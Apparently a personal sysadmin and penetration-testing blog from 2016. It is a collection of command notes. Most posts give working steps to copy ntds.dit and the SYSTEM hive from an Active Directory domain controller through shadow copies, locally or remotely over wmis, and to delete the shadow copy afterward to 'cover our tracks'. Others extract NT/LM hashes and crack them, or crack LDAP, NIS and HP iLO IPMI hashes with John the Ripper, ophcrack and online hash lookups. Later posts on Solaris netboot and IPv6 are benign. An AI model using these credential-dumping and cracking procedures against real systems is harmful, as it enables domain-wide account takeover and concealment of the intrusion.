syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
however.
if you are are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing their lines out in that
order to an output file.
easy. then you parse away.
password cracking post john
post dsusers.py and john...
let's say you've cracked away and can't crack the hash.
someone may already have for you.
findmyhash is an automated way to search online databases:
# findmyhash TYPE -h "hash" -g (searches the Google)
Do a batch job because you don't want to copy and paste
your life away (no Google, sorry):
# findmyhash TYPE -f FILE
...
that's useful, but doing things with a file is the way to go.
here's how to create a file with post-cracked john LANMAN
passes... the below shows what's left, does some formatting,
removes the first couple of fields, and dumps the type of password.
# john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \
cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only
however, the findmyhash man pages state that for LANMAN/NT hashes
having both hashes is best. dsusers.py ohpc format does this for us...
ophcrack files are formatted thus:
uid::lmhash:nthash:sid::
1 23 4 5 67
we want columns 3 and 4.
note: not all active directory accounts have a stored LANMAN password. crud.
that's why we're using sed to remove the leading : . joy.
# cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only
now plug it in:
# findmyhash LM -f nthash.only
yay! our passwords are all over the internets. who knew?
..
a cracking interlude...
passwords found in LDAP databases can be challenging.
Type can be any number of type: MD5, CRYPT, DES, NT, LANMAN
gross. just gross. but... if the passwords you're accessing are
from an LDAP-Samba database, get at one of those passwords and
you're golden. figuring out the hash type can be challenging.
hash-identifier may be of use.
# hash-identifier
place hash on HASH: line
and then you can use the same format as above with findmyhash.
only, specify MD5, CRYPT...
Monday, October 24, 2016
ophcrack and jtr coexisting notes
when using ophcrack and dsusers.py do not specify lmhash as dsusers.py will
place the lmhashes and nthashes in the same file for use by ophcrack.
python ~/ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \
--passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system
when running ophcrack via a cracking rig, here's the format:
# ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \
-t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \
-f ~/oph/domain-nthash.oph
-l log of work
-o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.
-d location of rainbow tables
-t are the rainbow table directories
-f the oph hash file
let's say you've already run your grabbed hashes through john and want to crack the
leftovers via ophcrack.
# ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \
sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort
# sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph
# gawk -F:: '
FNR==NR {a[NR]=$1; next};
{b[$1]=$0}
END{for (i in a) if (a[i] in b) print b[a[i]]}
' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph
Friday, October 21, 2016
jtr and wordlists notes
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst
# cat local-upper.lst >> local.lst
if you're cracking des or nt or pretty much anything that is not solely uppercase
and want to eventually feed it into lm brute forcing:
# dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.
........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
* C:\ vssadmin create shadow /for=C:
you should see:
Successly create shadow for 'C:\'
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
* C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get intall wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for ShadowsCopy that is where you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /mnt
ntds.dit SYSTEM
........................................
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
credump
# git clone https://github.com/moyix/creddump.git
ntdsextract
# get clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/ntds ~/ntds.dit
# ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhast.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
solaris 11 default passwords
from oracle support:
On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.
well. that's nice. that means jack, right?
Friday, October 14, 2016
dump and crack nis/nis+ password database
yeah well. that was easy.
# ypcat passwd > <file>
# john <file>
# john --show <file>
really.
Thursday, October 13, 2016
afterthefact postgre metasploit user password set
let's just say you set up metaspoit with msf user and forget to set the password.
you go to msfconsole and see:
Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit
crap.
$ sudo -u postgres psql
\password msf
set the password and quit
\q
edit:
$ sudo nano -w /opt/metasploit-framework/config/database.yml
On the line password: supply it.
$ echo sigh.
let's crack default factory-shipped hp ilo passwords with john
let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
doing simple alpha or num cracks.
yes let's, shall we?
# mkdir -p /opt/john/dictionaries
# cd /opt/john/dictionaries
# crunch 8 8 0123456789 > eightnum.lst <- 890M
# crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
# ./john --session=ipmi32 --fork=8 --format=rakp \
--wordlist=/opt/john/dictionaries/eightnum.lst out.john
gross
let's do it with both wordlists.# ls /opt/john/dictionaries/ | xargs -t -I files \
./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \
--fork=8 --format=rakp out.john
now you can let it run against all the numbers and all the alpha.
--rules will do crazy upper and lower case (just in case).
although. you may forego using wordlists altogether if you're doing simple alpha or num cracks.
go to /opt/john/john.conf and add the following stanza:
[Incremental:UpperEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 26
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.
it may take forever, but, yay.
# ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john
here's something for hp's default random 8 character string of 10 digits:
[Incremental:DigitsEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 10
# ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john
for gpu cracking
first, always check how many gpus you have available
# nvida-smi
0, 1 under the GPU heading means you have two.
when passing the command line options to john,
get cracking:
# ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john
* this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are
forking the cracking job between the two of them.
Using default input encoding: UTF-8
Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])
Remaining 116 password hashes with 116 different salts
Node numbers 1-2 of 2 (fork)
Device 1@crackingrig: Quadro NVS 295
Device 0@crackingrig: Quadro NVS 295
Press 'q' or Ctrl-C to abort, almost any other key for status
* if you press <enter> <enter>
2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor
1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie
you'll see something similar to the above. notice that the GPU is not frying.
* nb the idea of cores does not apply to gpus, so stick to fork=2 or you might
have a really bad day. really. pay no attention to --list=cuda-devices and seeing:
Number of stream processors: 8 (1 x 8)
and that thought that it means --fork=8 per processor.
here're some numbers to dissuade you for brute-force processing:
0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212
2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632
4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905
8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691
16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s 3556p/s 3556c/s 3556C/s GPU:80°C A-214..Administrtor214
Tuesday, October 11, 2016
soup to nuts install of metasploit on ubuntu 14.04 lts
soup to nuts install of metasploit on ubuntu 14.04 lts
..........
install base
* priv
passwd
nano -w /etc/ssh/sshd_config
ssh-keygen -t rsa -b 2048
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 \
libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \
git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \
libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \
nmap tcpdump subversion cmake bison flex
..........
rbenv
* non-priv
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
rbenv install 2.3.1
rbenv global 2.3.1
ruby -v
..........
postgre sql server
* non-priv
sudo -s
su postgres
cd ~
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit
..........
hashcat (not a hot idea on a virtual machine)
* as priv user
sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo
sudo mkdir /usr/bin/OpenCL
cd /opt
wget https://hashcat.net/files/hashcat-3.10.7z
p7zip -d hashcat-3.10.7z
mv hashcat-3.10/ hashcat
cd hashcat
cp hashcat64.bin /usr/bin
ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat
..........
john
* as priv user
apt-get install build-essential libssl-dev yasm libgmp-dev \
libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev \
nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 nvidia-cuda-toolkit opencl-headers <- if you have an nvidia gpu
fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
libopenmpi-dev openmpi-bin <- for mpi support
* a gpu note
lshw -C video
rexgen
apt-get install libboost-regex1.54-dev <- meh
svn checkout https://github.com/teeshop/rexgen.git rexgen
cd rexgen/trunk/src/
mkdir build && cd build
cmake ..
make && sudo make install
ldconfig
git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
cd john/src
./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4
* because unicode, yes.
./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
--enable-experimental-code && make -s clean && make -sj4
* if gpu
cd .. && mv run /opt/john
** test gpu
john --list=cuda-devices
john --list=opencl-devices
let's get some password lists
cd /opt/john
mkdir /opt/john/dictionaries
cd /opt/john/dictionaries
cp .. /wordlist.lst .
wget http://download.openwall.net/pub/wordlists/all.gz .
wget https://download.g0tmi1k.com/wordlists/large/crackstation-human-only.txt.gz .
* nb crackstation may show up as a binary file. i'd suggest after extraction:
strings crackstation-human-only.lst > crackstation.txt
fix the environment
edit:
/etc/environment
add /opt/john to PATH
add line JOHN="/opt/john/"
** odds and sods
john --list=formats --format=opencl
john --list=formats --format=cuda
john ~/shadow <- openmp crack session
john --format=sha512crypt-opencl ~/shadow <- opencl session
john --format=sha512crypt-cuda ~/shadow <- cuda session
** add'l chr files
wget https://www.korelogic.com/Resources/Tools/rockyou.chr
wget https://www.korelogic.com/Resources/Tools/rockyou-lanman.chr
* nb http://contest-2010.korelogic.com/rules.html
..........
crunch
* priv user
wget https://sourceforge.net/projects/crunch-wordlist/files/latest/download -O crunch-3.6.tgz
tar xvfz crunch-3.6.tgz
make
make install
..........
metasploitframework
* non-priv
cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
..........
armitage (metasploit gui)
* priv
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
sudo nano /opt/metasploit-framework/config/database.yml
production:
adapter: postgresql
database: msf
username: msf
password:
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
..........
run it
* non-priv
msfconsole
Thursday, October 6, 2016
remove solaris 8 jumpstart services from a solaris 8 jumpstart server
yucky gross solaris 8 jumpstart server begone!
# grep -v "^#" /etc/inetd.conf <- shows what is defined.
hashed finger, tftp, &c in /etc/inetd.conf
# pkill -HUP inetd
bash-2.03# rm /etc/ethers
bash-2.03# rm /etc/bootparams
bash-2.03# rm -rf /tftpboot
bash-2.03# rm -rf /jumpstart
# ptree
to determine if bootparamd is forked (saw entiries in rpcinfo -p)
443 /usr/sbin/rpc.bootparamd
441 /usr/sbin/in.rarpd -a
looked for rarp in /etc/rc2.d ... then all of /etc
# find . -type f -exec grep -l "rarp" {} +
found it... "*nfs.server"
hashed out rard & bootparamd lines
# If /tftpboot exists become a boot server
# if [ -d /tftpboot ]; then
# /usr/sbin/in.rarpd -a
# /usr/sbin/rpc.bootparamd
# fi
Monday, October 3, 2016
netboot solaris 10 via ubuntu 14 using RARP
I did something bad and my Sun T1000 decided to stop booting due to the most
recent patchset.
Luckily ALOM was installed and I could ssh in and see:
Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010
Flow across the console.
This is firmware issue as:
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48
Host flash versions:
Hypervisor 1.3.4 2007/03/28 06:03
OBP 4.25.11 2007/12/07 23:44
POST 4.25.11 2007/12/08 00:10
The patchset is for 6.4. Of course.
Happily the T1000 lacks an optical drive nor any means of connecting one.
No USB either Great.
The next option was to do a network boot. Oh boy.
I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14
with all the preqs for an old-stype Jumpstart server:
* TFTP
* Bootparamd
* NFSv4
* RARP
* Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)
* Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/139435-10.zip)
The reason why I am doing RARP is due to the fact that my network already
has a DHCPvM$ server.
RARP uses reverse ARP to receive its IP address. So, by sending out RARP packets, my
Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.
My systems for this exercise are:
netboot
10.97.32.186
hostnix01 10.97.32.166
0A6120A6 (IP as hex)
00:14:4f:e5:f7:9a
..........................................
netboot
..........................................
packages:
# apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server
rarpd:
# vi /etc/default/rarpd
Change the last line to match the tftpd-hpa directory and the NIC name:
OPTS="-v -b /var/lib/tftpboot/ eth0"
iso mount:
# mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/
nfsd:
# mkdir -p /media/solaris10
# mkdir -p /opt/solaris10.patches
Define a share in NFS for this mount point as this mount will be used to serve
the patches. Open the following file:
# vi /etc/exports
Add the following entries:
/media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
/opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
bootparamd:
# vi /etc/bootparams
sunfire root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in
per URL: Some explanation for the above: This defines which host gets the specified
NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve
specified the absolute path. Note that server: is the hostname of the server running
the NFS service and was mentioned in my post earlier as my server is originally named
"netboot". The name used is the hostname of your server, substitute it to the correct name.
rarpd:
# vi /etc/hosts
Add the following entry:
10.97.32.166 hostnix01
Create the ethers file:
vi /etc/ethers
Add the following entry:
00:14:4f:e5:f7:9a hostnix01
per URL: Replace the MAC address with the MAC of your Sun server. You can change the
hostname as well, but needs to be the same everywhere!
tftpd:
vi /etc/default/tftpd-hpa
Change the TFTP_ADDRESS line to the following:
TFTP_ADDRESS=":69"
per URL: The configuration of the server is now complete One last step we need to do is
to copy the netboot kernel for the Sun server. This resides on the mounted Solaris
install image. By default OpenBoot will look for a kernel using TFTP when using network
boot. Based on it’s IP-address it will look for a matching HEX filename. We can find out
which filename that would be by running the following:
# printf "%02X%02X%02X%02X" 10 97 32 166
This will result in the following (for my IP-address):
0A6120A6
The above will be the netboot kernel for the Sun server. Place the netboot kernel in place:
# cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4u/inetboot /var/lib/tftpboot/C0A800E6
restart the services in order
service tftpd-hpa restart
service bootparamd restart
service nfs-kernel-server restart
service rarpd restart
..........................................
hostnix01
..........................................
# ssh admin@hostnix01-alom (remote management shell)
sc> poweron
sc> console -f
When you see mac address, get into openboot
#.
sc> break -y
Switch back to console and netboot the kernel
sc> console -f
ok > boot net:rarp -avs
* https://docs.oracle.com/cd/E19455-01/805-7228/hbsparcboot-60/index.html
* interactive, verbose, single user mode (does not include install flag)
After waiting next to forever...
# mkdir /tmp/mount
# mount -F nfs 10.97.32.186:/opt/solaris10.patches /tmp/mount
# cd /tmp/mount
# unzip 139435-10.zip
# cd 139435-10
# ./sysfwdownload /pwd/patch.bin
Run patching command via sysfwdownload. If you see:
"sysfwdownload: file could not be opened"
that means the installer requires the full path; e.g.:
/tmp/mount/139435-10/Firmware/SPARC_Enterprise_T1000/Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
# ./sysfwdownload Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
.......... (10%).......... (20%).......... (30%).......... (41%)..........
(51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)
Download completed successfully
# init 0
Now you should be back at the 'ok' prompt. Now on the ALOM:
sc> poweroff
SC Alert: SC Request to Power Off Host.
SC Alert: Host system has shut down.
sc> setkeyswitch -y normal
sc> flashupdate -s 127.0.0.1
sc> resetsc
Your ssh console will be terminated due to a broken pipe.
ssh back in and issue:
sc> poweron
sc> console -f
And you're back!
verify:
SPARC Enterprise T1000, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
OpenBoot 4.30.4.e, 3968 MB memory available, Serial #82179994.
Ethernet address 0:14:4f:e5:f7:9a, Host ID: 84e5f79a.
Boot device: disk File and args:
ufs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/boot_archive
ramdisk-root hsfs-file-system
Loading: /platform/SUNW,SPARC-Enterprise-T1000/kernel/sparcv9/unix
SunOS Release 5.10 Version Generic_150400-38 64-bit
Copyright (c) 1983, 2016, Oracle and/or its affiliates. All rights reserved.
os-io WARNING: failed to resolve 'scsa,probe' driver alias, defaulting to 'nulldriver'
WARNING: failed to resolve 'scsa,nodev' driver alias, defaulting to 'nulldriver'
Hostname: hostnix01
Configuring devices.
LDAP NIS domain name is
No panics. Yay!
#.
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.7.13 2013/09/24 08:10
Host flash versions:
OBP 4.30.4.e 2013/09/23 16:06
Hypervisor 1.7.3.d 2013/09/24 07:19
POST 4.30.4.b 2010/07/09 14:25
All is as it should be.
....
some of this was lifted from here:
https://www.arm-blog.com/installing-solaris-10-on-a-sunfire-v210-via-network/
Friday, September 16, 2016
Thursday, September 15, 2016
solaris 10 sysidcfg example
sometimes you get tired of pressing esc 2. after you create your zone, plop this file in: /zonename/root/etc/sysidcfg issue: # zoneadm -z zonename boot # zlogin -C zonename and have a ball, y'all
system_locale=en_US
timezone=US/Eastern
terminal=vt100
timeserver=localhost
name_service=DNS {domain_name=nothere.com
name_server=10.6.7.8,10.6.7.9
search=nothere.com}
nfs4_domain=dynamic
root_password=nVgCm2Wm0wNVZ <---- from /etc/shadow, fool.
network_interface=primary {hostname=hostfromhades
default_route=10.6.6.1
ip_address=10.6.6.6
netmask=255.255.255.0
protocol_ipv6=yes}
security_policy=none
the fabled ipv6 sol 10 post
IPv6 in Shared-Stack Zones
By user12618912 on Oct 08, 2009
I was recently at an OpenSolaris user-group meeting where a question was asked regarding how IPv6 could be used from a shared-stack zone. For the benefit of anyone who has a similar question, here is an example of a working configuration:
bash-3.2# zoneadm list -iv
ID NAME STATUS PATH BRAND IP
0 global running / native shared
- test installed /export/home/test native excl
- test2 installed /export/home/test2 native shared
The exclusive-stack zone "test" has all of its own networking configured within it, so IPv6 inherently just works there. The question, however, was about shared-stack, and so I setup the "test2" zone to demonstrate this.
bash-3.2# zonecfg -z test2
zonecfg:test2> add net
zonecfg:test2:net> set physical=e1000g0
zonecfg:test2:net> set address=fe80::1234/10
zonecfg:test2:net> end
zonecfg:test2> add net
zonecfg:test2:net> set physical=e1000g0
zonecfg:test2:net> set address=2002:a08:39f0:1::1234/64
zonecfg:test2:net> end
zonecfg:test2> verify
zonecfg:test2> commit
zonecfg:test2> exit
bash-3.2# zonecfg -z test2 info
zonename: test2
zonepath: /export/home/test2
brand: native
...
net:
address: 10.8.57.111/24
physical: e1000g0
defrouter not specified
net:
address: fe80::1234/10
physical: e1000g0
defrouter not specified
net:
address: 2002:a08:39f0:1::1234/64
physical: e1000g0
defrouter not specified
Here I configured a link-local address fe80::1234/10, and a global address 2002:a08:39f0:1::1234/64. Each interface within each zone requires a link-local address for use with neighbor-discovery, and the global address is the address used for actual IPv6 communication by applications and services. The global address' prefix is one that is configured on the link to which the interface is connected. In the zone, we end up with:
bash-3.2# zlogin test2 ifconfig -a6
lo0:1: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
e1000g0:2: flags=2000841<UP,RUNNING,MULTICAST,IPv6> mtu 1500 index 2
inet6 fe80::1234/10
e1000g0:3: flags=2000841<UP,RUNNING,MULTICAST,IPv6> mtu 1500 index 2
inet6 2002:a08:39f0:1::1234/64
The global zone has IPv6 connectivity using this same prefix as well as a default IPv6 route: [2]
bash-3.2# netstat -f inet6 -rn
Routing Table: IPv6
Destination/Mask Gateway Flags Ref Use If
--------------------------- --------------------------- ----- --- ------- -----
2002:a08:39f0:1::/64 2002:a08:39f0:1:214:4fff:fe1e:1e72 U 1 0 e1000g0:1
fe80::/10 fe80::214:4fff:fe1e:1e72 U 1 0 e1000g0
default fe80::1 UG 1 0 e1000g0
::1 ::1 UH 1 21 lo0
From the non-global zone, we have IPv6 connectivity:
bash-3.2# zlogin test2 ping -sn 2002:8194:aeaa:1:214:4fff:fe70:5530
PING 2002:8194:aeaa:1:214:4fff:fe70:5530 (2002:8194:aeaa:1:214:4fff:fe70:5530): 56 data bytes
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=0. time=4.654 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=1. time=2.632 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=2. time=2.501 ms
64 bytes from 2002:8194:aeaa:1:214:4fff:fe70:5530: icmp_seq=3. time=2.571 ms
\^C
----2002:8194:aeaa:1:214:4fff:fe70:5530 PING Statistics----
4 packets transmitted, 4 packets received, 0% packet loss
round-trip (ms) min/avg/max/stddev = 2.501/3.090/4.654/1.044
enable ipv6 on solaris10 afterthefact
effing oracle.
you have this:
# ifconfig inet6 interface plumb up
which in my case is:
# ifconfig inet6 igb0 plumb up
and it spits out:
ifconfig: igb0: bad address (try again later)
no. your doc writers are jerks. here's what it should look like:
root@host:~$ ifconfig igb0 inet6 plumb
root@host:~$ ifconfig igb0 inet6 token ::10/64
root@host:~$ svcadm enable svc:/network/routing/ndp:default
root@host:~$ pkill -HUP in.ndpd
root@host:~$ ifconfig -a6
igb0: flags=2000840<RUNNING,MULTICAST,IPv6> mtu 1500 index 2
